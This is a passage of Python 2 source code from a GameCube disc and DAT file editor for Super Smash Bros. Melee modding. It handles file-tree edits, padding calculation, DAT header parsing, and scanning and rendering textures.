iidSelectionsTuple = Gui.isoFileTree.selection()
if iidSelectionsTuple:
for iid in iidSelectionsTuple:
# Count the items about to be removed, and then remove them from the file tree
if Gui.isoFileTree.exists( iid ): # This double-check is in case selections overlap (e.g. a folder and items within it were selected)
filesRemoved, foldersRemoved = getTotalItems( iid )
totalFilesRemoved += filesRemoved
totalFoldersRemoved += foldersRemoved
if Gui.isoFileTree.exists( iid ): Gui.isoFileTree.delete( iid ) # May not exist if it was in a folder that has already been deleted
global unsavedDiscChanges
unsavedDiscChanges.append( str(totalFilesRemoved) + ' files and ' + str(totalFoldersRemoved) + ' folders removed.' )
globalDiscDetails['rebuildRequired'] = True
updateProgramStatus( 'Items Removed. Awaiting Save' )
def moveSelectedToDirectory():
if not discDetected(): return
iidSelectionsTuple = Gui.isoFileTree.selection()
if iidSelectionsTuple == '':
msg( 'There are no items selected.' )
return
# Make sure the system folder and/or files within it are not selected.
systemFileFolder = globalDiscDetails['gameId'].lower() + '/sys'
for item in iidSelectionsTuple:
if item == systemFileFolder or Gui.isoFileTree.parent( item ) == systemFileFolder:
msg( 'System files and the system files folder cannot be modified.' )
return
# Get a list of folders currently in the disc (so the user can select a destination folder)
directoriesDict = {}
def browseFolders( folderIid='' ):
for item in Gui.isoFileTree.get_children( folderIid ):
_, entity, isoOffset, _, isoPath, _, _ = Gui.isoFileTree.item( item, 'values' ) # description, entity, isoOffset, fileSize, isoPath, source, data
if entity == 'folder' and isoOffset == 'native': # This is a folder that was originally in the disc's filesystem
directoriesDict[ isoPath ] = item
browseFolders( item )
browseFolders() # starts with the root
# Cancel if there are no valid directories to move to.
if directoriesDict == {}:
msg( 'There are no folders native to the disc to move these to.' )
return
# Present the user with a dropdown menu to choose a directory to move the selected items to
dropDownMessage = 'Choose a directory to move these items to:\n(Only folders native to the disc will appear here.)'
dropdownWindow = popupDropdownWindow( Gui.root, message=dropDownMessage, title='Move Item(s)', dropdownOptions=directoriesDict.keys() )
if dropdownWindow.dropDownValue.get(): # The dropDownValue will be an empty string if the window was canceled.
targetDirIid = directoriesDict[ dropdownWindow.dropDownValue.get() ]
# Move the selected items to the chosen folder
totalFilesMoved = 0
totalFoldersMoved = 0
for item in iidSelectionsTuple:
if Gui.isoFileTree.exists( item ): # This double-check is in case selections overlap (e.g. a folder and items within it were selected)
filesRemoved, foldersRemoved = getTotalItems( item )
totalFilesMoved += filesRemoved
totalFoldersMoved += foldersRemoved
Gui.isoFileTree.move( item, targetDirIid, 'end' )
Gui.isoFileTree.item( item, tags='changed' )
Gui.isoFileTree.item( targetDirIid, tags='changed' )
global unsavedDiscChanges
unsavedDiscChanges.append( str(totalFilesMoved) + ' files and ' + str(totalFoldersMoved) + ' folders moved to ' + dropdownWindow.dropDownValue.get() + '.' )
globalDiscDetails['rebuildRequired'] = True
updateProgramStatus( 'Items Moved. Awaiting Save' )
def getInterFilePaddingLength( totalNonSystemFiles=0, totalFileSpace=0 ): # totalFileSpace is totaled from both system and main disc files, plus alignment adjustments
paddingSettingsValue = settings.get( 'General Settings', 'paddingBetweenFiles' ).lower()
if paddingSettingsValue == 'auto':
standardGameCubeDiscSize = 1459978240
spaceToFill = standardGameCubeDiscSize - totalFileSpace
if spaceToFill < 0: interFilePaddingLength = 0
else: interFilePaddingLength = spaceToFill / ( totalNonSystemFiles + 1 ) # The +1 allows for one more region of padding at the end of the disc.
else:
try:
if '0x' in paddingSettingsValue: interFilePaddingLength = int( paddingSettingsValue, 16 )
else: interFilePaddingLength = int( paddingSettingsValue )
except: interFilePaddingLength = int( generalSettingsDefaults['paddingBetweenFiles'], 16 )
# Undercut (reduce) the padding length, if necessary, to guarantee it is aligned to 4 bytes
interFilePaddingLength -= interFilePaddingLength - int( 4 * math.floor(float(interFilePaddingLength) / 4) )
return interFilePaddingLength
def getCssIid():
cssIid = ''
if not globalDiscDetails['isMelee']:
print '\t\tCannot get CSS iid; disc detected as not Melee.'
else:
cssIid = scanDiscForFile( 'MnSlChr.u' ) # May be .usd (English) or .ukd (in PAL)
if not cssIid: cssIid = scanDiscForFile( 'MnSlChr.0' ) # For 20XXHP v4.07/07+/07++
if not cssIid: print '\t\tMnSlChr file not found.'
return cssIid
#================================#
# ~ ~ Primary DAT Operations ~ ~ #
#================================#
def parseDatHeader( fileData ): # depricated. only the function below this is still using it
""" Reads basic stats from the DAT's header. Input should be a bytes or bytearray object,
and may be the entire file data or just the header (first 0x20 bytes). """
if not isinstance( fileData, bytearray ) and not isinstance( fileData, bytes ):
raise IOError( 'Invalid input to parseDatHeader! Should be a bytearray or bytes.' )
headerData = {}
headerData['filesize'] = toInt( fileData[:4] )
headerData['rtStart'] = rtStart = toInt( fileData[4:8] ) # Size of the data block
headerData['rtEntryCount'] = rtEntryCount = toInt( fileData[8:12] )
headerData['rootNodeCount'] = rootNodeCount = toInt( fileData[12:16] )
headerData['referenceNodeCount'] = referenceNodeCount = toInt( fileData[16:20] )
headerData['rtEnd'] = rtEnd = rtStart + ( rtEntryCount * 4 )
headerData['stringTableStart'] = rtEnd + (rootNodeCount * 8) + (referenceNodeCount * 8)
return headerData
def parseStringTable( localDatData, sortNodes=True ): # depricated. only one function still using this
try:
if not isinstance( localDatData, bytearray ) and not isinstance( localDatData, bytes ):
raise IOError( 'Invalid input to parseStringTable! Should be a bytearray or bytes.' )
headerInfo = parseDatHeader( localDatData )
rootAndRefNodesTable = localDatData[0x20 + headerInfo['rtEnd']:0x20 + headerInfo['stringTableStart']]
nodesTable = [ rootAndRefNodesTable[i:i+8] for i in xrange(0, len(rootAndRefNodesTable), 8) ] # list comprehension; separates the data into groups of 8 bytes
stringTable = localDatData[0x20 + headerInfo['stringTableStart']:]
stringDict = {}
offset = 0
strings = stringTable.split(b'\x00')[:len(nodesTable)] # Final splicing eliminates an empty string and/or extra additions at the end of the file.
for stringBytes in strings:
string = stringBytes.decode( 'ascii' ) # Convert from a bytearray to a string
stringDict[offset] = string
offset += len( string ) + 1 # +1 to account for null terminator
rootNodes = []; referenceNodes = [] # Both of these will be a list of tuples of the form ( filePointer, string )
for i, entry in enumerate( nodesTable ):
stringOffset = toInt( entry[4:] ) # first 4 bytes
filePointer = toInt( entry[:4] ) # second 4 bytes
string = stringDict[ stringOffset ]
if i < headerInfo['rootNodeCount']: rootNodes.append( ( filePointer, string ) )
else: referenceNodes.append( ( filePointer, string ) )
if sortNodes:
rootNodes.sort()
referenceNodes.sort()
return rootNodes, referenceNodes, stringDict
except:
return [], [], {}
def updatePrevNextFileButtons( currentFile, forStandaloneFile=False ):
""" Updates the Next/Previous DAT buttons on the DAT Texture Tree tab. Sets their target file to load,
their tooltip/pop-up text, and the mouse cursor to appear when hovering over it. 'currentFile' will
be a full/absolute file path if this is for a standalone file, (one not in a disc)
otherwise it will be an iid for the file in the Disc File Tree tab. """
if forStandaloneFile:
# Get a list of all DAT and/or USD files (plus whatever current file type is loaded) in the current directory.
currentDirectory, filename = os.path.split( currentFile )
currentExtension = filename.split('.')[-1]
filenamesList = [ f for f in os.listdir(currentDirectory) if os.path.isfile(os.path.join(currentDirectory, f)) ] # Builds a list of files; excludes folders
filteredFilenamesList = [ fn for fn in filenamesList if any([ fn.lower().endswith(ext) for ext in [currentExtension, '.dat', '.usd'] ]) ] # Removes files of other types.
# Iterate the files list to find the currently loaded file
for i, filename in enumerate( filteredFilenamesList ):
if os.path.join( currentDirectory, filename ) == currentFile:
# Check whether there is a previous entry.
if i != 0:
prevFile = filteredFilenamesList[i-1]
Gui.previousDatText.set( prevFile )
Gui.previousDatButton.bind( '<1>',
lambda event, prevPath=os.path.normpath( os.path.join(currentDirectory, prevFile) ): loadPreviousOrNextDat(prevPath) )
Gui.previousDatButton.config( cursor='hand2' )
else:
Gui.previousDatText.set( 'No more!' )
Gui.previousDatButton.unbind( '<1>' )
Gui.previousDatButton.config( cursor='' )
# Check whether there is a next entry.
if i != len(filteredFilenamesList) - 1:
nextFile = filteredFilenamesList[i+1]
Gui.nextDatText.set( nextFile )
Gui.nextDatButton.bind( '<1>',
lambda event, nextPath=os.path.normpath( os.path.join(currentDirectory, nextFile) ): loadPreviousOrNextDat(nextPath) )
Gui.nextDatButton.config( cursor='hand2' )
else:
Gui.nextDatText.set( 'No more!' )
Gui.nextDatButton.unbind( '<1>' )
Gui.nextDatButton.config( cursor='' )
break
else: # The current file is from a disc. 'currentFile' is an iid string.
# Update the prev. file button
prevItem = Gui.isoFileTree.prev( currentFile )
while prevItem != '' and Gui.isoFileTree.item( prevItem, 'values' )[1] != 'file':
prevItem = Gui.isoFileTree.prev( prevItem ) # Skips over any folders.
if prevItem != '':
Gui.previousDatText.set( prevItem )
Gui.previousDatButton.bind( '<1>', lambda event, item=prevItem: loadPreviousOrNextDat(item) )
Gui.previousDatButton.config( cursor='hand2' )
else:
Gui.previousDatText.set( 'No more!' )
Gui.previousDatButton.unbind('<1>')
Gui.previousDatButton.config( cursor='' )
# Update the next file button
nextItem = Gui.isoFileTree.next( currentFile )
while nextItem != '' and Gui.isoFileTree.item( nextItem, 'values' )[1] != 'file':
nextItem = Gui.isoFileTree.next( nextItem ) # Skips over any folders.
if nextItem != '':
Gui.nextDatText.set( nextItem )
Gui.nextDatButton.bind( '<1>', lambda event, item=nextItem: loadPreviousOrNextDat(item) )
Gui.nextDatButton.config( cursor='hand2' )
else:
Gui.nextDatText.set( 'No more!' )
Gui.nextDatButton.unbind('<1>')
Gui.nextDatButton.config( cursor='' )
def loadPreviousOrNextDat( newFileToLoad ):
""" Loads the next/previous file from a disc or within a folder. Used by the Previous / Next DAT buttons on the DAT Texture Tree tab.
'newFileToLoad' is an iid from the Gui.isoFileTree treeview widget. """
if Gui.datTextureTree.lastLoaded.source == 'disc':
loadFileWithinDisc( newFileToLoad, changeTab=False ) # Includes checks on whether the user wants to save prior changes built-in
else:
# Make sure there aren't any changes that the user wants to save before loading in a new file
if newFileToLoad.lower().endswith( '.bnr' ):
if globalBannerFile and not globalBannerFile.noChangesToBeSaved( programClosing ): return
else: restoreEditedEntries( editedBannerEntries )
else:
if globalDatFile and not globalDatFile.noChangesToBeSaved( programClosing ): return
else: restoreEditedEntries( editedDatEntries )
loadStandaloneFile( newFileToLoad, changeTab=False )
def browseTexturesFromDisc():
""" Wrapper for the 'Browse Textures' button in the GUI (or file tree double-click) and option in the dropdown menus. """
if not discDetected(): return
iidSelectionsTuple = Gui.isoFileTree.selection()
if len( iidSelectionsTuple ) == 0: msg( 'Please select a file to browse in.' )
elif len( iidSelectionsTuple ) > 1: msg( 'Please only select one file to browse in.' )
else:
loadFileWithinDisc( iidSelectionsTuple[0] )
def analyzeFileFromDisc():
""" Wrapper for the 'Analyze Structure' button in the GUI (or file tree double-click) and option in the dropdown menus. """
if not discDetected(): return
iidSelectionsTuple = Gui.isoFileTree.selection()
if len( iidSelectionsTuple ) == 0: msg( 'Please select a file to analyze.' )
elif len( iidSelectionsTuple ) > 1: msg( 'Please only select one file to analyze.' )
else:
loadFileWithinDisc( iidSelectionsTuple[0], toAnalyze=True )
def loadFileWithinDisc( iid, toAnalyze=False, changeTab=True ):
""" Prepares a file in a disc for reading in the DAT Texture Tree tab. Called by the 'Browse Images' button,
the dropdown menus, and the loadPrevious/NextDat buttons. """
_, entity, _, _, isoPath, _, _ = Gui.isoFileTree.item( iid, 'values' )
if entity != 'file':
msg( 'Please only select a file (not a folder) to browse in for textures.' )
return
# Set the selected item in the ISO File Tree, so that it's clear which file is being viewed in DAT Texture Tree.
Gui.isoFileTree.selection_set( iid )
Gui.isoFileTree.focus( iid )
Gui.isoFileTree.see( iid ) # Scrolls to the given item to make sure it's visible in the tree
# Ensure the disc can still be located
if not discDetected(): return
updatePrevNextFileButtons( iid )
global globalBannerFile, globalDatFile
fileExt = isoPath.split( '.' )[-1].lower()
# Ask the user if they'd like to save any unsaved changes before forgetting the current file
if fileExt == 'bnr':
# Make sure there aren't any changes the user wants saved
if globalBannerFile and not globalBannerFile.noChangesToBeSaved( programClosing ): return
globalBannerFile = hsdFiles.datFileObj( source='disc' ) # Close enough match that that container will work well
if not globalBannerFile.load( iid, fileData=getFileDataFromDiscTreeAsBytes( iid=iid ), fileName=os.path.basename(isoPath) ):
updateProgramStatus( 'Banner File Could Not Be Loaded' )
msg( 'The disc that this file resided in, or the exernal file that this referenced, can no longer be found (it may have been moved/renamed/deleted).' )
else:
restoreEditedEntries( editedBannerEntries )
Gui.datTextureTree.lastLoaded = globalBannerFile
Gui.mainTabFrame.select( Gui.discDetailsTab )
reloadBanner()
updateProgramStatus( 'File Scan Complete' )
else:
# Make sure there aren't any changes the user wants saved
if globalDatFile and not globalDatFile.noChangesToBeSaved( programClosing ): return
globalDatFile = hsdFiles.datFileObj( source='disc' )
if not globalDatFile.load( iid, fileData=getFileDataFromDiscTreeAsBytes( iid=iid ), fileName=os.path.basename(isoPath) ):
updateProgramStatus( 'DAT File Could Not Be Loaded' )
msg( 'The disc that this file resided in, or the exernal file that this referenced, can no longer be found (it may have been moved/renamed/deleted).' )
else:
restoreEditedEntries( editedDatEntries )
Gui.datDestination.set( isoPath )
Gui.datTextureTree.lastLoaded = globalDatFile
clearDatTab()
clearStructuralAnalysisTab()
# Disable the tab switch feature if it is desired but we're already on the right tab (the handler won't activate)
currentTab = Gui.root.nametowidget( Gui.mainTabFrame.select() )
if toAnalyze and currentTab == Gui.savTab: changeTab = False
elif not toAnalyze and currentTab == Gui.datTab: changeTab = False
if changeTab:
# Switch tabs, and let the event handler bound to tab switching handle calling of the scan/analyze function.
if toAnalyze:
Gui.mainTabFrame.select( Gui.savTab )
else:
Gui.mainTabFrame.select( Gui.datTab )
elif currentTab == Gui.savTab:
analyzeDatStructure()
else:
scanDat()
def loadStandaloneFile( filepath, toAnalyze=False, changeTab=True ):
""" This function updates the Next/Previous DAT buttons on the DAT Texture Tree tab,
it then loads the appropriate next/previous banner or DAT file and scans it. """
#todo perhaps move checks on whether the user wants to save unsaved changes to this function
updatePrevNextFileButtons( filepath, forStandaloneFile=True )
# Check if this is a banner file or a DAT
if filepath.split( '.' )[-1].lower() == 'bnr':
if changeTab:
Gui.mainTabFrame.select( Gui.discDetailsTab )
global globalBannerFile
globalBannerFile = hsdFiles.datFileObj()
globalBannerFile.load( filepath )
Gui.isoDestination.set( filepath )
Gui.datTextureTree.lastLoaded = globalBannerFile
updateBannerFileInfo()
updateProgramStatus( 'File Scan Complete' )
else:
global globalDatFile
globalDatFile = hsdFiles.datFileObj()
globalDatFile.load( filepath )
Gui.datDestination.set( filepath )
Gui.datTextureTree.lastLoaded = globalDatFile
clearDatTab()
clearStructuralAnalysisTab()
# Disable the tab switch feature if it is desired but we're already on the right tab (the handler won't activate in this case)
currentTab = Gui.root.nametowidget( Gui.mainTabFrame.select() )
if changeTab:
if toAnalyze and currentTab == Gui.savTab: changeTab = False
elif not toAnalyze and currentTab == Gui.datTab: changeTab = False
if changeTab:
# Switch tabs, and let the event handler bound to tab switching handle calling of the scan/analyze function.
if toAnalyze:
Gui.mainTabFrame.select( Gui.savTab )
else:
Gui.mainTabFrame.select( Gui.datTab )
elif currentTab == Gui.savTab:
analyzeDatStructure()
else:
scanDat()
def clearDatTab( restoreBackground=False ):
# Remove any existing entries in the treeview.
for item in Gui.datTextureTree.get_children(): Gui.datTextureTree.delete( item )
# Reset the size of the texture display canvas, and clear its contents (besides the grid)
Gui.textureDisplay.configure( width=Gui.textureDisplay.defaultDimensions, height=Gui.textureDisplay.defaultDimensions )
Gui.textureDisplay.delete( Gui.textureDisplay.find_withtag('border') )
Gui.textureDisplay.delete( Gui.textureDisplay.find_withtag('texture') )
# Add or remove the background drag-n-drop image
if restoreBackground:
Gui.datTextureTreeBg.place( relx=0.5, rely=0.5, anchor='center' )
else: # This function removes them by default
Gui.datTextureTreeBg.place_forget()
Gui.datTextureTreeFiltersMsg.place_forget()
# Reset the values on the Image tab.
Gui.datFilesizeText.set( 'File Size: ' )
Gui.totalTextureSpaceText.set( 'Total Texture Size: ' )
Gui.texturesFoundText.set( 'Textures Found: ' )
Gui.texturesFilteredText.set( 'Filtered Out: ' )
# Disable some tabs by default (within the DAT Texture Tree tab), and if viewing one of them, switch to the Image tab
if Gui.root.nametowidget( Gui.imageManipTabs.select() ) != Gui.textureTreeImagePane:
Gui.imageManipTabs.select( Gui.textureTreeImagePane )
Gui.imageManipTabs.tab( Gui.palettePane, state='disabled' )
Gui.imageManipTabs.tab( Gui.modelPropertiesPane, state='disabled' )
Gui.imageManipTabs.tab( Gui.texturePropertiesPane, state='disabled' )
# Clear the repositories for storing image data (used to prevent garbage collected)
Gui.datTextureTree.fullTextureRenders = {}
Gui.datTextureTree.textureThumbnails = {}
def scanDat( priorityTargets=() ):
""" This function is the main function to handle reading and displaying textures from a DAT file,
whether from a disc or a standalone file. After identifying texture locations and properties,
rendering is performed in separate processes. These processes are started and waited for in a
separate thread, so that this function may return and allow for GUI responsiveness. """
if not globalDatFile: return
# If this function is called while already processing a file, queue cancellation of the last instance of the function.
# The last function instance will then re-call this to scan the new file.
global scanningDat, stopAndScanNewDat
if scanningDat:
stopAndScanNewDat = True
return
# Check what kind of file this is (this is done a bit more below as well).
if globalDatFile.fileExt == 'dol':
scanDol()
updateProgramStatus( 'File Scan Complete' )
else: # Anything else is assumed to be a dat/usd/lat/rat, etc.
hI = globalDatFile.headerInfo
if hI['rootNodeCount'] > 300 or hI['referenceNodeCount'] > 300 or hI['rtEntryCount'] > 45000: # Values too large will cause the loops in the following section to fully lock up a computer.
updateProgramStatus( 'wut' )
msg( 'This file has an unrecognized data structure.'
'\n\nRoot Node count: ' + str(hI['rootNodeCount']) +
'\nReference Node count: ' + str(hI['referenceNodeCount']) +
'\nRT Entry count: ' + str(hI['rtEntryCount']) )
else:
updateProgramStatus( 'Scanning File....' )
Gui.programStatusLabel.update()
# Prepare to populate the image tree list
if len( globalDatFile.rtData ) > 200000:
updateProgramStatus( '¿Qué?' )
msg('This file has an unrecognized data structure.'
'\n\nRT Data Byte Length: ' + str( len(globalDatFile.rtData) ) + \
'\nCalculated Number of RT Entries: ' + str( len(globalDatFile.rtData)/4 ) )
else: # Seems to be some kind of DAT. Find the textures!
scanningDat = True
texturesInfo = identifyTextures( globalDatFile )
texturesFound = texturesFiltered = totalTextureSpace = 0
filteredTexturesInfo = []
if rescanPending(): return
elif texturesInfo: # i.e. textures were found
texturesInfo.sort( key=lambda infoTuple: infoTuple[0] ) # Sorts the textures by file offset
dumpImages = generalBoolSettings['dumpPNGs'].get()
loadingImage = Gui.imageBank( 'loading' )
for imageDataOffset, imageHeaderOffset, paletteDataOffset, paletteHeaderOffset, width, height, imageType, mipmapCount in texturesInfo:
# Ignore textures that don't match the user's filters
if not passesImageFilters( imageDataOffset, width, height, imageType ):
if imageDataOffset in priorityTargets: pass # Overrides the filter
else:
texturesFiltered += 1
continue
# Initialize a structure for the image data
imageDataLength = hsdStructures.ImageDataBlock.getDataLength( width, height, imageType ) # Returns an int (counts in bytes)
imageDataStruct = globalDatFile.initDataBlock( hsdStructures.ImageDataBlock, imageDataOffset, imageHeaderOffset, dataLength=imageDataLength )
imageDataStruct.imageHeaderOffset = imageHeaderOffset
imageDataStruct.paletteDataOffset = paletteDataOffset # Ad hoc way to locate palettes in files with no palette data headers
imageDataStruct.paletteHeaderOffset = paletteHeaderOffset
filteredTexturesInfo.append( (imageDataOffset, width, height, imageType, imageDataLength) )
totalTextureSpace += imageDataLength
texturesFound += 1
# Highlight any textures that need to stand out
tags = []
#if width > 1024 or width % 2 != 0 or height > 1024 or height % 2 != 0: tags.append( 'warn' )
if mipmapCount > 0: tags.append( 'mipmap' )
# Add this texture to the DAT Texture Tree tab, using the thumbnail generated above
Gui.datTextureTree.insert( '', 'end', # '' = parent/root, 'end' = insert position
iid=str( imageDataOffset ),
image=loadingImage,
values=(
uHex(0x20 + imageDataOffset) + '\n('+uHex(imageDataLength)+')', # offset to image data, and data length
(str(width)+' x '+str(height)), # width and height
'_'+str(imageType)+' ('+imageFormats[imageType]+')' # the image type and format
),
tags=tags
)
# Add any associated mipmap images, as treeview children
if mipmapCount > 0:
parent = imageDataOffset
for i in xrange( mipmapCount ):
# Adjust the parameters for the next mipmap image
imageDataOffset += imageDataLength # This is of the last image, not the current imageDataLength below
width = int( math.ceil(width / 2.0) )
height = int( math.ceil(height / 2.0) )
imageDataLength = getImageDataLength( width, height, imageType )
# Add this texture to the DAT Texture Tree tab, using the thumbnail generated above
Gui.datTextureTree.insert( parent, 'end', # 'end' = insertion position
iid=str( imageDataOffset ),
image=loadingImage,
values=(
uHex(0x20 + imageDataOffset) + '\n('+uHex(imageDataLength)+')', # offset to image data, and data length
(str(width)+' x '+str(height)), # width and height
'_'+str(imageType)+' ('+imageFormats[imageType]+')' # the image type and format
),
tags=tags
)
filteredTexturesInfo.append( (imageDataOffset, width, height, imageType, imageDataLength) )
# Immediately decode and display any high-priority targets
if priorityTargets:
for textureInfo in texturesInfo:
if textureInfo[0] not in priorityTargets: continue
imageDataOffset, _, _, _, width, height, imageType, _ = textureInfo
dataBlockStruct = globalDatFile.getStruct( imageDataOffset )
renderTextureData( imageDataOffset, width, height, imageType, dataBlockStruct.length, allowImageDumping=dumpImages )
# Update the GUI with some of the file's main info regarding textures
Gui.datFilesizeText.set( "File Size: {:,} bytes".format(hI['filesize']) )
Gui.totalTextureSpaceText.set( "Total Texture Size: {:,} b".format(totalTextureSpace) )
Gui.texturesFoundText.set( 'Textures Found: ' + str(texturesFound) )
Gui.texturesFilteredText.set( 'Filtered Out: ' + str(texturesFiltered) )
if rescanPending(): return
if not filteredTexturesInfo: # Done (no textures to display). Nothing else left to do here.
scanningDat = False # Should be set to False by the GUI thumbnail update loop if the method below is used instead.
else:
# tic = time.clock()
if 0: # Disabled, until this process can be made more efficient
#print 'using multiprocessing decoding'
# Start a loop for the GUI to watch for updates (such updates should not be done in a separate thread or process)
Gui.thumbnailUpdateJob = Gui.root.after( Gui.thumbnailUpdateInterval, Gui.updateTextureThumbnail )
# Start up a separate thread to handle and wait for the image rendering process
renderingThread = Thread( target=startMultiprocessDecoding, args=(filteredTexturesInfo, globalDatFile, Gui.textureUpdateQueue, dumpImages) )
renderingThread.daemon = True # Allows this thread to be killed automatically when the program quits
renderingThread.start()
else: # Perform standard single-process, single-threaded decoding
#print 'using standard, single-process decoding'
i = 1
for imageDataOffset, width, height, imageType, imageDataLength in filteredTexturesInfo:
# Skip items that should have already been processed
if imageDataOffset in priorityTargets: continue
# Update this item
renderTextureData( imageDataOffset, width, height, imageType, imageDataLength, allowImageDumping=dumpImages )
# Update the GUI to show new renders every n textures
if i % 10 == 0:
if rescanPending(): return
Gui.datTextureTree.update()
i += 1
scanningDat = False
# toc = time.clock()
# print 'image rendering time:', toc - tic
updateProgramStatus( 'File Scan Complete' )
if Gui.datTextureTree.get_children() == (): # Display a message that no textures were found, or they were filtered out.
Gui.datTextureTreeFiltersMsg.place( relx=0.5, rely=0.5, anchor='center' )
def rescanPending():
global scanningDat, stopAndScanNewDat, programClosing
# Allow this function instance to end gracefully if it is no longer needed (only one should ever be running)
if stopAndScanNewDat:
#cancelCurrentRenders() # Should be enabled if multiprocess texture decoding is enabled
scanningDat = False
stopAndScanNewDat = False
# Restart the DAT/DOL file scan
clearDatTab()
scanDat()
return True
elif programClosing:
Gui.root.destroy()
return True
else:
return False
def cancelCurrentRenders():
""" Used for multi-process texture decoding. Stops the GUI thumbnail update loop and shuts down rendering process pool. """
# Cancel the GUI's thumbnail update loop if it's running
if Gui.thumbnailUpdateJob:
Gui.root.after_cancel( Gui.thumbnailUpdateJob )
Gui.thumbnailUpdateJob = None
# Stop currently active rendering processes
if Gui.processRenderingPool:
Gui.processRenderingPool.close()
Gui.processRenderingPool.terminate()
Gui.processRenderingPool = None
# Empty the thumbnail update queue (this is more efficient than re-creating it)
try:
while True:
Gui.textureUpdateQueue.get_nowait() # Will raise an exception and exit once the loop is empty
except: pass
def startMultiprocessDecoding( filteredTexturesInfo, datFileObj, resultQueue, dumpImages ):
""" Creates separate processes for decoding texture data for faster performance. This is done in a
separate thread in order to avoid blocking GUI updates from a function that doesn't immediately return. """
# Create a pool of processors to perform the rendering
processors = multiprocessing.cpu_count()
Gui.processRenderingPool = multiprocessing.Pool( processors ) #, maxtasksperchild=1
for textureProperties in filteredTexturesInfo:
Gui.processRenderingPool.apply_async( decodeTextureData, args=(textureProperties, datFileObj, resultQueue, dumpImages) )
# All the jobs have been started. Now wait for them to finish and close the pool.
Gui.processRenderingPool.close()
Gui.processRenderingPool.join() # Blocks until all processes are finished
Gui.processRenderingPool = None
global stopAndScanNewDat
if not stopAndScanNewDat:
Gui.textureUpdateQueue.put( (None, -1) )
#Gui.root.event_generate( '<<message>>', when='mark' )
def isEffectsFile( datFileObj ): # Checks the Root/Reference Nodes and string table
# Expecting just one root node, and no reference nodes
if len( datFileObj.rootNodes ) == 1 and len( datFileObj.referenceNodes ) == 0:
rootStructOffset, stringTableSymbol = datFileObj.rootNodes[0]
if rootStructOffset == 0 and stringTableSymbol.startswith( 'eff' ): # Effects file confirmed
return True
return False
def identifyTextures( datFile ): # todo: this function should be a method on various kinds of distinct dat file objects
""" Returns a list of tuples containing texture info. Each tuple is of the following form:
( imageDataOffset, imageHeaderOffset, paletteDataOffset, paletteHeaderOffset, width, height, imageType, mipmapCount ) """
imageDataOffsetsFound = set()
texturesInfo = []
# tic = time.clock()
try:
# Check if this is a special file with texture data end-to-end
if (0, 'SIS_MenuData') in datFile.rootNodes: # For alphabet textures such as Kanji; SdMenu.dat/.usd
if datFile.fileExt not in ( 'frd', 'gmd', 'itd', 'spd', 'ukd' ): # PAL files; no textures in these, just strings
# There are no headers for these images, but they all have the same properties.
textureTableStart = toInt( datFile.data[:4] )
totalTextures = ( datFile.headerInfo['rtStart'] - textureTableStart ) / 0x200 # 0x200 is the image data length
#scanEndToEndImageData( textureTableStart, width, height, imageType, imageDataLength, totalTextures )
for i in range( totalTextures ):
imageDataOffset = textureTableStart + ( i * 0x200 )
texturesInfo.append( (imageDataOffset, -1, -1, -1, 32, 32, 0, 0) )
elif (0x1E00, 'MemSnapIconData') in datFile.rootNodes: # The file is LbMcSnap.usd or LbMcSnap.dat (Memory card banner/icon file from SSB Melee)
# Banner details
texturesInfo.append( (0, -1, -1, -1, 96, 32, 5, 0) )
# Icon details
texturesInfo.append( (0x1800, -1, 0x1C20, -1, 32, 32, 9, 0) )
elif (0x4E00, 'MemCardIconData') in datFile.rootNodes: # The file is LbMcGame.usd or LbMcGame.dat (Memory card banner/icon file from SSB Melee)
# Details on three banners
for offset in ( 0, 0x1800, 0x3000 ):
texturesInfo.append( (offset, -1, -1, -1, 96, 32, 5, 0) )
# Icon details
texturesInfo.append( (0x4800, -1, 0x4C20, -1, 32, 32, 9, 0) )
else: # Standard DAT processing
# Check if this is an Effects file. These have standard structuring as well as some unique table structuring
if isEffectsFile( datFile ):
# Initialize Struct 0x20 (present in all effects files)
rootStruct = datFile.getStruct( 0 ) # 0 is the 0x20 offset relative to the data section
# Check children of Struct 0x20 until a Joint Object is found; structs up until this may be large blocks of image data with rudimentary headers
imageDataOffset = -1
imageBlockOffsets = []
for childStructOffset in rootStruct.getChildren():
potentialJointObj = datFile.getStruct( childStructOffset )
if potentialJointObj.validated(): break
else:
imageBlockOffsets.append( childStructOffset )
for mainEffHeaderTableOffset in imageBlockOffsets:
# Check the first two bytes; values of 0042 indicate that the header actually starts 0x8 bytes in
if datFile.data[mainEffHeaderTableOffset+1] == 0x42:
mainHeaderStart = mainEffHeaderTableOffset + 8
continue # Unsure if these tables even point to textures; if they do, they seem to be in another structure format
else: mainHeaderStart = mainEffHeaderTableOffset
# Get the entry count of the table (number of table pointers it contains), and the entries themselves
mainTableEntryCount = toInt( datFile.data[mainHeaderStart:mainHeaderStart+4] )
headerTableData = datFile.data[mainHeaderStart+4:mainHeaderStart+4+(mainTableEntryCount*4)]
headerTablePointers = struct.unpack( '>' + str(mainTableEntryCount) + 'I', headerTableData )
for pointer in headerTablePointers:
# Process the E2E header
e2eHeaderOffset = mainEffHeaderTableOffset + pointer
textureCount, imageType, _, width, height = struct.unpack( '>5I', datFile.data[e2eHeaderOffset:e2eHeaderOffset+0x14] )
imageDataPointersStart = e2eHeaderOffset + 0x18
imageDataPointersEnd = imageDataPointersStart + ( 4 * textureCount )
imageDataPointerValues = struct.unpack( '>' + textureCount * 'I', datFile.data[imageDataPointersStart:imageDataPointersEnd] )
if imageType == 9:
paletteDataPointersEnd = imageDataPointersEnd + ( 4 * textureCount )
paletteDataPointerValues = struct.unpack( '>' + textureCount * 'I', datFile.data[imageDataPointersEnd:paletteDataPointersEnd] )
for i, offset in enumerate( imageDataPointerValues ):
imageDataOffset = mainEffHeaderTableOffset + offset
if imageType == 9:
# Need to get the palette data's offset too. Its pointer is within a list following the image data pointer list
paletteDataOffset = mainEffHeaderTableOffset + paletteDataPointerValues[i]
texturesInfo.append( (imageDataOffset, e2eHeaderOffset, paletteDataOffset, e2eHeaderOffset, width, height, imageType, 0) )
else:
texturesInfo.append( (imageDataOffset, e2eHeaderOffset, -1, -1, width, height, imageType, 0) )
datFile.lastEffTexture = imageDataOffset
# If this a stage file, check for particle effect textures
if datFile.fileName.startswith( 'Gr' ) and 'map_texg' in datFile.stringDict.values():
for offset, string in datFile.rootNodes:
if string == 'map_texg':
structStart = offset
break
# Get the entry count of the table (number of table pointers it contains), and the entries themselves
mainTableEntryCount = toInt( datFile.data[structStart:structStart+4] )
headerTableData = datFile.data[structStart+4:structStart+4+(mainTableEntryCount*4)]
headerTablePointers = struct.unpack( '>' + str(mainTableEntryCount) + 'I', headerTableData )
for pointer in headerTablePointers: # These are all relative to the start of this structure
# Process the E2E header
